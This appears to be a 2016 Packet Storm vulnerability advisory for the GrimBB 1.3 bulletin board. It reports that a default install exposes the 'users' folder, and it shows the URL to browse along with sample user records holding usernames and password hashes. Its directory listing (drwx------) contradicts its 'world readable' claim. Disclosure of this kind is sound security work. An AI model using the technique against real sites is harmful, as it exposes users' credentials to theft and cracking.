Grimbb 1.3 Hash Disclosure

2016-11-05T00:00:00
ID PACKETSTORM:139583
Type packetstorm
Reporter N_A
Modified 2016-11-05T00:00:00

Description

                                        
                                            `  
Grimbb V1.3 User and Password Hash Disclosure  
==============================================  
  
  
Discovered by N_A, N_A[at]tutanota.com  
=======================================  
  
  
  
  
Description  
============  
  
A PHP 4 Open Source Flat File Based Bulletin Board System -> GrimBB uses text files to store the data for posts (doesn't need outside database like MySQL). Its easy to configure (only two distribution files require changes to achieve immediate results).  
  
  
https://sourceforge.net/projects/grimbb  
  
  
  
  
  
Vulnerability  
==============  
  
  
After a *default* installation of Grim Bulletin Board v 1.3 permissions for the 'users' folder is world readable resulting in full disclosure of   
stored usernames and password hashes  
  
root@kali:/var/www/html/grimbb# ls -al  
.........  
.........  
  
drwx------A 2 www-data www-dataA 4096 NovA 5 18:13 users  
  
root@kali:/var/www/html/grimbb#   
  
  
  
  
Exploitation  
=============  
  
Go to the following URL:  
  
http://127.0.0.1/grimbb/users  
  
  
Files containing usernames and hashes are readble, examples below:  
  
  
  
  
type = 3  
name = "jimmy"  
pass = "15dfb4e0bc6ec941b33bbf26f532116b"  
logdate = "201611"  
register = "201611051813390"  
userip = *********  
  
  
type = 0  
name = "admin"  
pass = "d7e20b780957b7ba1b3b82fd76cf1485"  
logdate = "201611"  
register = "201611051634460"  
userip = **********  
  
  
type = 3  
name = "pentest"  
pass = "185eb48dec37cdedb5713c104841941d"  
logdate = "201611"  
register = "201611051813140"  
userip = **********  
  
  
  
  
Email  
======  
  
N_A[at]tutanota.com  
--  
Securely sent with Tutanota. Claim your encrypted mailbox today!  
https://tutanota.com  
`